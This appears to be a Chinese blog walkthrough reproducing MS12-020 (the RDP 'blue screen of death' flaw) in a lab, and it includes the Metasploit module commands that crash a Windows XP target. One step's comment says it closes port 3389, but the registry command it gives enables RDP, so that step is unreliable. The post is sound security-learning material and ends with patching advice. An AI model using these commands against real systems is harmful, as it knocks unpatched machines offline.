MS12_020 "死亡蓝屏"漏洞

MS12_020 "死亡蓝屏"漏洞


免责声明:

此文章仅用于学习研究使用,请勿用于违法犯罪,请遵守《网络安全法》等相关法律法规。


漏洞概述:

MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞

远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。Windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化的或已经删除的对象,导致任意代码执行,然后控制系统。

影响范围:

Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 SP2(用于基于 Itanium 的系统)
Windows Vista Service Pack 2
Windows Server 2008(用于 32 位系统)Service Pack 2
Windows Server 2008(用于基于 x64 的系统)Service Pack 2
Windows Server 2008(用于基于 Itanium 的系统)Service Pack 2
Windows 7(用于 32 位系统)和 Windows 7(用于 32 位系统)Service Pack 1
Windows 7(用于基于 x64 的系统)和 Windows 7(用于基于 x64 的系统)Service Pack 1
Windows Server 2008 R2(用于基于 x64 的系统)和 Windows Server 2008 R2(用于基于 x64 的系统)Service Pack 1
Windows Server 2008 R2(用于基于 Itanium 的系统)和 Windows Server 2008 R2(用于基于 Itanium 的系统)Service Pack 1

环境搭建:

Windows XP(目标机)开启3389端口,关闭防火墙
Kali(攻击机)

复现:

1.Windows XP 这里我们在命令端关闭3389端口,也可以手动关闭

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
netstat -an   ###查看开启的端口

MS12_020
2.使用Metasploit查找MS12_020漏洞

msfconsole
search ms12_020

MS12_020
3.使用该漏洞,查看options并添加参数、目标机IP,开始攻击

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
show options
set rhosts 192.168.221.131
exploit

MS12_020
4.这时我们查看Windows XP时,已经蓝屏,然后会自动重启了
MS12_020

修复建议:

1.安装相应系统补丁
2.开启防火墙、关闭3389端口

你可能感兴趣的:(漏洞复现,安全,windows)